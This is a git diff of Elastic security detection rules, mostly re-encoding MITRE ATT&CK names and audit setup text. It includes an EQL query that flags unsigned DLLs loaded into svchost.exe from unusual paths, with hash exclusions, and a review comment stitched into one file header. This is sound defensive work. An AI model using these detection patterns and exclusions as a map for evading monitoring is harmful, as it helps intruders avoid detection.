\"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created 
within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n 
\"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -113,7 +113,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json
index b0887c2d884..b2a887d5d64 100644
--- a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json
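Review bot: The `dll.path` list in the new `query` of 78ef0c95-…_5.json carries `"?:\\Windows\\security\\*"` twice (once after the `ServiceState` entry, once after `TextInput`); the duplicate adds nothing to the match and only makes the path allow-list harder to audit, so one copy should go. The five values excluded by `not dll.hash.sha256 : (...)` have no annotation saying what they are or why they are exempt, so a maintainer cannot tell whether an exclusion is still warranted; since the query already uses EQL `/* ... */` comments, a line such as `/* hash exclusions: record the origin of each entry here */` above the list would help. These JSON files look like generated copies of an upstream rule source, so both fixes presumably belong there rather than in this package.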
+++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json
@@ -43,7 +43,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -99,7 +99,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json
index 426c37aae8e..dc09b8b9ab6 100644
--- a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json
index f45f99d7b98..e809dea8639 100644
--- a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json
index 50dfd734c03..314a6d1376d 100644
--- a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json
index 376d1a1ea3f..bdd65b7f49d 100644
--- a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json
index ceb044d8034..7f5f498b93e 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json
index e7d5c424609..787608a8f8f 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json
index c7f36e5756e..d1ef9194512 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json
index 39d95e53a5d..6e9e59f3ebd 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json
index 29f1df6808e..df0922c2b0d 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json
index 5a5f6e41980..b82502d55db 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json
index a30c9835ca5..a1c41e1ba6b 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json
index c490fa74302..c624c7343ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de",
- "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n",
+ "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json
index 7b38836f346..bffecb53805 100644
--- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json
index 44f7d47b574..573239ba8b4 100644
--- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json
index de013db5a55..bf2373f77be 100644
--- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json
index ffd4fd349db..82d54ced4b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json
index 7b94e066641..7facb8c55aa 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json
index b8f0d9bd4de..a269a4ad02a 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json
index 8f9880bb7c1..7c680fddcec 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
